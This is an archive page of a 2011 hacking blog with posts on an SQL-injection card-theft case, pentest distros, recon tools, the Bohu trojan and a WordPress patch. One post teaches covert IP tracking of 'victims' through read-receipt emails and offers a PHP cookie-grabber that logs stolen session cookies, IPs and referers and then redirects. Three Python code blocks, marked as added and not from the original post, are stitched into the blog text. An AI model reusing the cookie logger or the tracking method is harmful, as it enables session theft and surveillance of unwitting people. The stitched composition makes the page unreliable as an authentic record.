Showing posts with label General. Show all posts

Thursday, April 28, 2011

Hacker Used SQL-injection to Get 675K Credit Card

A computer hacker from Georgia has pleaded guilty to fraud and identity theft after authorities found him with more than 675,000 stolen credit card accounts on his home computers. Credit card companies have traced more than $36 million in fraudulent transactions to the accounts that were breached by Rogelio Hackett.
How did he do it? Briefly, the hacker used SQL injection attacks on web resources; he was able to use different SQL vulnerabilities even though this kind of vulnerability is well known. SQL injection is one of the popular attacks on a web application's backend database. It is not like an XSS vulnerability, where the attacker uses JavaScript to target the client browser: SQL injection targets the SQL statement being executed by the application on the backend database.
Hackers usually identify a SQL injection vulnerability by adding invalid or unexpected characters to a parameter value and watching for errors in the application's response. For example:
http://www.example.com/users.asp?id=mark'
If the request generates an error, it is a good indication of a mishandled quotation mark, and the application may be vulnerable to SQL injection attacks. I think that automated tools can do a fast job of checking for these vulnerabilities, such as Havij, a very fast tool that helps penetration testers find and exploit SQL injection vulnerabilities on a web page.
SQL-code attacks exploit poorly written web-based applications that directly write data into the database. In fact, SQL injection does not depend on the application language: programming mistakes allow SQL injection in almost any programming language.
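The quote probe above and the fix for it, as an added example (not code from the original post): a small Python/sqlite3 lookup whose table, function names and sample rows are constructed for illustration. It shows why `mark'` produces a database error when the parameter is concatenated into the SQL text, and why binding the parameter removes the error without rejecting names that legitimately contain a quote.

```python
import sqlite3


def make_db():
    """Build an in-memory users table (constructed sample data)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id TEXT PRIMARY KEY, email TEXT)")
    db.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [
            ("mark", "mark@example.com"),
            ("anna", "anna@example.com"),
            ("o'brien", "obrien@example.com"),  # a legitimate value containing a quote
        ],
    )
    return db


def lookup_vulnerable(db, user_id):
    """Flawed pattern: the request parameter is pasted into the SQL text,
    so a quote in the value changes how the statement is parsed."""
    sql = "SELECT id, email FROM users WHERE id = '" + user_id + "'"
    return db.execute(sql).fetchall()


def lookup_parameterized(db, user_id):
    """Hardened pattern: the value is bound as data and never parsed as SQL."""
    return db.execute(
        "SELECT id, email FROM users WHERE id = ?", (user_id,)
    ).fetchall()


def probe(db, lookup, user_id):
    """Return ('rows', n) on success or ('sql-error', message) on a database error.
    A 'sql-error' outcome is what surfaces to the client as the error page
    described in the text."""
    try:
        return ("rows", len(lookup(db, user_id)))
    except sqlite3.Error as exc:
        return ("sql-error", str(exc))


if __name__ == "__main__":
    db = make_db()
    for value in ("mark", "mark'", "o'brien"):
        print(repr(value))
        print("  concatenated :", probe(db, lookup_vulnerable, value))
        print("  parameterized:", probe(db, lookup_parameterized, value))
```

The concatenated version fails on both `mark'` and the legitimate `o'brien`, which is why filtering quotes out of input is not the fix; binding parameters is.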
That's why it is very important to conduct application black-box penetration testing, as this can reveal OWASP Top 10 application vulnerabilities, including SQL injection, parameter manipulation, cookie poisoning, and XSS.
An attacker who wishes to grab usernames and passwords might try phishing and social engineering attacks against some of the application's users. On the other hand, hackers can try to pull everyone's credentials directly from the database.

Saturday, March 5, 2011

Hacking A Biometric System



Description: This paper, "Penetration Testing Biometrics Systems", was presented at NullCon 2011.

You can read the detailed paper by following the link below.

PDF version: http://www.fb1h2s.com/Null_Biometrics.pdf

Wednesday, March 2, 2011

HOW TO GET IP ADDRESS EASILY

I have been getting requests that the content we are posting is not easy for beginners. I was a little disappointed with such a review, so here we go: a simple yet effective post about the very basics of the Internet and networking, the IP address.




What is an IP address?
Every device connected to the public Internet is assigned a unique number known as an Internet Protocol (IP) address. IP addresses consist of four numbers separated by periods (also called a 'dotted-quad') and look something like 112.123.123.121 (this is an example of IPv4).


What can be done with an IP address?

The IP address is the very basic unit before you start a hack. It's basically used for fingerprinting and tracing, and if the victim is weak it won't take 10 secs to penetrate through a vulnerability :)


HOW can I get an IP address?

It's an easy task to get your own as well as others' IP addresses.
To get your own IP address, just go to this website


How to get the IP of a website?
Go to a shell (command prompt) and just type ping www.target.com
and it will start showing the numeric address, just like in this picture


How to get IP address of friends or victims?

Using E-mail receipts


An e-mail receipt is a kind of notification you get as an e-mail when someone opens (reads) the mail sent by you.


This notification consists of
  • IP address of the mail reader.
  • Time and date of reading the mail.
  • Name and version of his browser.
You need to follow these steps:


a. Step 1:-

Visit readnotify and sign up there. You can use your Gmail, Yahoo, Hotmail, Rediff or any email ID. They give free trials for 2 weeks or 25 emails, whichever comes first.


b. Step 2:-

Let's say you have used your email ID example@gmail.com to register on readnotify.com; then log in to your email account first.


c. Step 3:-

Click on the Compose mail menu and in the To: section write the email ID of the culprit followed by readnotify.com, so the complete email address would be like victim@gmail.com.readnotify.com.
The rest is just the normal procedure of email.


d. Step 4:-

You are done. Just wait for the victim to open that email and voilà, you will get the details.
 

Using PHP scripts

Here is the basic PHP script:
<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('file.txt', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Referer: '.$referer.'<br><br><br>');
fclose($fp);
header ("Location: http://google.com/")
?>
Process: save it on your hosting (ripway, my3gb, blackapplehost etc.). Don't forget to create a file.txt file, which will save all the IPs.

This will save IPs with the date, the time and where the link came from, plus you can redirect to another URL, just like I redirected to Google, in a matter of seconds.

An upcoming post will be on fingerprinting with an IP address, so we can work with a flow.

Do share your views on this post; I tried to keep it simple.

Wednesday, February 23, 2011

WEAKERTHAN LINUX FOR HACKERS

Most of you will have heard about BackTrack, but it's not the only one in the business. Weakerthan is another Linux-based pentesting distro which is really good. Weakerthan is my second favorite after BackTrack.


Intro:


WeakNet Linux is designed primarily for penetration testing, forensic analysis and other security tasks. The default desktop environment is GNOME.

The tools I have selected are tools we use all the time here. As I said, if you find some that you want in it, please let me know. The image is about 1GB, meaning it will have to be on DVD, meaning I can't host it here without risk of bandwidth dying! I need a place to upload it to. Some code written by WeakNet Labs Assistants from this site that is preinstalled:

* BRuWRT-FORSSE v2.0
* Easy-SSHd
* Web-Hacking-Portal v2.0
* Perlwd
* Netgh0st v3.0
* YouTube-Thief!
* Netgh0st v2.2
* DomainScan
* ADtrace
* Admin-Tool
* Tartarus v0.1
* and much more..


Really good GUI + vulnerable applications to test our hacking skills.


My personal experience with WeakNet was really good and it's worth it.


WEAKERTHANv2 WeakNet Linux 5 - ISO ~684MB 
WeakNet Linux Complete Administration Guide 

Sunday, February 20, 2011

WHAT IS LINUX


As you move in this world of hacking, you will realise the importance of Linux for hackers, programmers and geeks.

I won't go deep here on hackersbay; for more tutorials and the functioning of Linux you can refer to our sister site

What exactly is Linux & its importance


Linux is an operating system based on Unix. Some other common operating systems are Unix (and its variants BSD, AIX, Solaris, HP-UX, and others); DOS; Microsoft Windows; Amiga; and Mac OS.

Linux was originally created by Linus Torvalds with the assistance of developers from around the globe. Linux is free to download, edit and distribute. Linux is a very powerful operating system and it is gradually becoming popular throughout the world.

The world's fastest supercomputer uses Linux, so you can realise how powerful Linux can be.

Linux is a free operating system, not like Windows, where you have to pay thousands of $$, costing half of the hardware of the PC. Linux is open source, which means anyone can edit it legally as per his/her convenience.

There are many distributions of Linux available: Ubuntu, Mandriva, Fedora, openSUSE, Mint etc.


But its desktop market share is 7-15% because it's not easy to use... but once you get in the habit of it, I bet you'll spit on Windows.

Advantages of Linux

1) BETTER SECURITY THAN WINDOWS -- Nowadays you can easily see Windows remote exploits flying around. Yes, Windows is easy to attack as compared to Linux.

2) RESOURCES AVAILABLE BY DEFAULT - Many software add-ons and drivers are already installed on it.

3) GOOD FOR HACKING - There are distributions specially designed for hackers: backtrack, weaknet, blackbuntu, secmic etc.

4) IT'S FREE, NOT LIKE WINDOWS (WHO WILL PAY THOUSANDS OF $$?)
The only Linux which costs some pennies is Red Hat.

5) LIVE CD - One of the best features: you can run it without even affecting your HD.

DISADVANTAGES

1) NOT MANY S/W companies support Linux-based software.

2) NOT AS EASY AS WINDOWS -- It's command based and requires tweaking.

3) EXE SUPPORT - The basic .exe extension is not supported, but you can run them via WINE.


What for beginners? Where to start from

Well, I would suggest Ubuntu (the only Linux for humans), as it has the largest community support, so if you have any problem it can be easily resolved, and it's a much more user-friendly Linux.

Grab these 2 books: Linux Bible & Ubuntu Unleashed. These books have good data on Linux and Ubuntu if you want to learn Linux more deeply.


For Linux tweaks and tutorials, we won't post them on HB; you can find them on basicgeeks.com

Upcoming updates: Linux distributions for hackers :)


Do share the post with your friends.

Friday, February 18, 2011

Websecurify Security Testing Framework



Websecurify is a powerful web application security testing platform designed from the ground up to provide the best combination of automatic and manual vulnerability testing technologies.

Some of the main features of Websecurify include:

  • Available for all major operating systems (Windows, Mac OS, Linux)
  • Simple to use user interface
  • Built-in internationalization support
  • Easily extensible with the help of add-ons and plugins
  • Exportable and customisable reports with any level of detail
  • Modular and reusable design
  • Powerful manual testing tools and helper facilities
  • Powerful analytical and scanning technology
  • Scriptable support for JavaScript and Python
  • Extensible via many languages including JavaScript, Python, C, C++ and Java 



You can download Websecurify here

Tuesday, February 15, 2011

QuickRecon: Simple Information Gathering Python Script

QuickRecon is a simple information gathering tool that allows you to:
  • Find subdomain names
  • Perform zone transfer
  • Gather emails from Google.com and Bing.com
For those unfamiliar with it, a DNS zone transfer is a type of DNS transaction that allows us to replicate the databases containing the DNS data across a set of DNS servers. Zone transfer comes in two flavors, full (opcode AXFR) and incremental (IXFR). AXFR stands for Asynchronous Full Transfer Zone and IXFR stands for Incremental Zone Transfer. This simple Python script depends on the DNS toolkit 'dnspython' when performing a zone transfer.


The e-mail gathering feature of this tool can also be used in a lot of ways – to learn about possible targets for account brute force, social engineering, etc.


The best part about this script is that it is compatible with multiple operating systems. It has been successfully tested on Windows XP and BackTrack 4 R2 with a Python 2.x installation.


Sample usage:
Obtaining subdomain names (built-in dictionary):
python quickrecon.py -m s -d example.com -o out.log


or (an external dictionary):
python quickrecon.py -m s -d example.com -i your_subdomains.txt


Zone Transfer:
python quickrecon.py -m z -d example.com


Gathering emails from Google.com and Bing.com:


python quickrecon.py -m e -d example.com -o out.log
python quickrecon.py -m e -d example.com -l 500
(quickrecon-0.2.zip) here.

Wednesday, February 9, 2011

Trojan to Disable Cloud-Based Antivirus--BOHU

A recent blog entry from the Microsoft Malware Protection Center details a new piece of malware (called Win32/Bohu.A) which is specifically designed to disable and mislead cloud-based antivirus software.
Cloud-based antivirus software differs from traditional antivirus software in that the antivirus client (running on the PC) sends important threat data to a server for backend analysis, and subsequently receives further detection and removal instruction.


The Bohu Trojan originates in China, where there is predominant use of cloud-based antivirus software. Once a Windows-based machine is infected, the malware installs different network-level filters to disrupt and block the antivirus client's access to the backend antivirus services on the Internet.
As well as writing random data at the end of its key payload components to avoid hash-based detection, Bohu also installs a Windows Sockets service provider interface (SPI) filter to block the antivirus network traffic as well as a Network Driver Interface Specification (NDIS) filter. The NDIS filter then stops the antivirus client from uploading data to the server by looking for the server addresses in the data packets.
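Why random data appended to a file defeats whole-file hash matching, and one way a scanner can hash around it, as an added example (not taken from the Microsoft write-up or from any antivirus product). The sample file is a constructed minimal PE-style image, and hashing only up to the end of the last section is an assumed normalisation chosen for illustration.

```python
import hashlib
import os
import struct


def build_sample_pe(section_data: bytes) -> bytes:
    """Constructed minimal PE-style image: DOS header, PE signature,
    COFF header (no optional header) and a single section."""
    e_lfanew = 64
    dos = b"MZ" + b"\x00" * 58 + struct.pack("<I", e_lfanew)       # 64 bytes
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0, 0x0102)    # 20 bytes
    raw_ptr = e_lfanew + 4 + len(coff) + 40                         # data follows the section table
    section = struct.pack(
        "<8sIIIIIIHHI", b".text", len(section_data), 0x1000,
        len(section_data), raw_ptr, 0, 0, 0, 0, 0x60000020,
    )                                                               # 40 bytes
    return dos + b"PE\x00\x00" + coff + section + section_data


def overlay_offset(data: bytes) -> int:
    """Return the file offset where the last section's raw data ends.
    Anything after that offset is overlay: bytes the loader never maps."""
    if len(data) < 64 or data[:2] != b"MZ":
        raise ValueError("not a PE file")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("missing PE signature")
    (n_sections,) = struct.unpack_from("<H", data, e_lfanew + 6)
    (opt_size,) = struct.unpack_from("<H", data, e_lfanew + 20)
    table = e_lfanew + 24 + opt_size
    end = table + 40 * n_sections
    for i in range(n_sections):
        # SizeOfRawData at +16 and PointerToRawData at +20 in each section header
        raw_size, raw_ptr = struct.unpack_from("<II", data, table + 40 * i + 16)
        if raw_size:
            end = max(end, raw_ptr + raw_size)
    return min(end, len(data))


def full_hash(data: bytes) -> str:
    """Whole-file SHA-256: changes whenever any appended byte changes."""
    return hashlib.sha256(data).hexdigest()


def image_hash(data: bytes) -> str:
    """SHA-256 over headers and section data only, ignoring the overlay."""
    return hashlib.sha256(data[:overlay_offset(data)]).hexdigest()


def overlay_size(data: bytes) -> int:
    """Number of trailing bytes outside every section; a non-zero value on a
    file that normally has none is itself worth flagging."""
    return len(data) - overlay_offset(data)


if __name__ == "__main__":
    base = build_sample_pe(b"constructed section bytes, not real code")
    for n in (0, 16, 48):
        sample = base + os.urandom(n)      # same image, different random tail
        print(n, full_hash(sample)[:16], image_hash(sample)[:16], overlay_size(sample))
```

Every sample prints a different whole-file hash once a tail is added, while the image hash stays the same across all of them.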

WordPress Releases Security Hardening Update

The WordPress project has announced the release of WordPress 3.0.5. Dubbed a security hardening release, it is an essential update for those with any untrusted user accounts, but it also comes with other important security enhancements and hardening for all WordPress installations.
Two cross-site scripting bugs have been squashed:
  • Properly encode title used in Quick/Bulk Edit, and offer additional sanitization to various fields. Affects users of the Author or Contributor role.
  • Preserve tag escaping in the tags meta box. Affects users of the Author or Contributor role.
Also included in 3.0.5 are two security enhancements, one of which improves the security of any plugins which were not properly leveraging the WordPress security API.
All WordPress administrators are encouraged to upgrade to this latest version. You can update automatically from the Dashboard > Updates menu in your site's admin area or download 3.0.5 directly.

Saturday, February 5, 2011

WhatWeb-Next Generation Web Explorer

Introduction

WhatWeb identifies content management systems (CMS), blogging platforms, stats/analytics packages, JavaScript libraries, servers and more. When you visit a website in your browser, the transaction includes many unseen hints about how the web server is set up and what software is delivering the web page.
Some of these hints are obvious, e.g. "Powered by XYZ", and others are more subtle. WhatWeb recognises these cues and reports what it finds.

WhatWeb has over 250 plugins and needs community support to develop more. Plugins can identify systems with obvious identifying hints removed by also looking for subtle clues. For example, a WordPress site might remove the tag, but the WordPress plugin also looks for "wp-content", which is less easy to disguise. Plugins are flexible and can return any datatype; for example, plugins can return version numbers, email addresses, account IDs and more.

There are both passive and aggressive plugins. Passive plugins use information on the page, in cookies and in the URL to identify the system. A passive request is as lightweight as a simple GET / HTTP/1.1 request. Aggressive plugins guess URLs and request more files. Plugins are easy to write; you don't need to know Ruby to make them.
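The obvious-versus-subtle hint idea described above, as an added example for auditing what your own site's responses still disclose (this is not WhatWeb code, which is written in Ruby). The rules, function names and both HTTP responses are constructed for illustration; the generator meta tag and the version numbers are assumptions of the sample.

```python
import re

# (platform, strength, where to look, pattern). Illustrative rules written
# for this example; they are not WhatWeb's plugin definitions.
RULES = [
    ("WordPress", "obvious", "body",
     re.compile(r'<meta[^>]+name=["\']generator["\'][^>]+content=["\']WordPress ?([\d.]*)', re.I)),
    ("WordPress", "subtle", "body",
     re.compile(r'/wp-content/(?:themes|plugins|uploads)/', re.I)),
    ("WordPress", "subtle", "header:set-cookie",
     re.compile(r'\bwordpress_[a-z_]+=', re.I)),
    ("PHP", "obvious", "header:x-powered-by",
     re.compile(r'PHP/?([\d.]*)', re.I)),
]

# Constructed sample: a default install that announces itself.
DEFAULT_SITE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache\r\n"
    "X-Powered-By: PHP/5.3.5\r\n"
    "\r\n"
    '<html><head><meta name="generator" content="WordPress 3.0.4" />'
    '<link rel="stylesheet" href="/wp-content/themes/sample/style.css" /></head></html>'
)

# Constructed sample: the same site after the banner and generator tag were removed.
HARDENED_SITE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache\r\n"
    "\r\n"
    "<html><head>"
    '<link rel="stylesheet" href="/wp-content/themes/sample/style.css" /></head></html>'
)


def parse_response(raw):
    """Split a raw HTTP response into a lower-cased header map and the body."""
    head, _, body = raw.partition("\r\n\r\n")
    headers = {}
    for line in head.split("\r\n")[1:]:          # skip the status line
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return headers, body


def fingerprint(raw):
    """Passive check: apply every rule to one response that was already fetched."""
    headers, body = parse_response(raw)
    findings = []
    for platform, strength, where, pattern in RULES:
        texts = [body] if where == "body" else headers.get(where.split(":", 1)[1], [])
        for text in texts:
            match = pattern.search(text)
            if match:
                version = (match.group(1) or None) if pattern.groups else None
                findings.append({"platform": platform, "strength": strength,
                                 "where": where, "version": version,
                                 "evidence": match.group(0)})
                break
    return findings


def residual_exposure(raw):
    """Platforms identifiable only through subtle hints, i.e. what is still
    disclosed after the obvious banners have been stripped."""
    found = fingerprint(raw)
    obvious = {f["platform"] for f in found if f["strength"] == "obvious"}
    subtle = {f["platform"] for f in found if f["strength"] == "subtle"}
    return sorted(subtle - obvious)


if __name__ == "__main__":
    for name, raw in (("default", DEFAULT_SITE), ("hardened", HARDENED_SITE)):
        print(name, fingerprint(raw), residual_exposure(raw))
```

On the hardened sample the version number is gone but the platform is still identified from the asset paths, so banner removal reduces detail rather than hiding the platform; patching remains the control that matters.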

Example Usage

I tested a simple command on our sister site www.basicgeeks.com and the result was good.

Log Output

There are currently 3 types of log output. They are:
--log-brief Brief logging. Default output
--log-full Full logging. Complete output from each plugin
--log-xml XML logging. Same information as default output but in XML format
You can output to multiple logs simultaneously by specifying multiple command line logging options.

You can download WhatWeb here
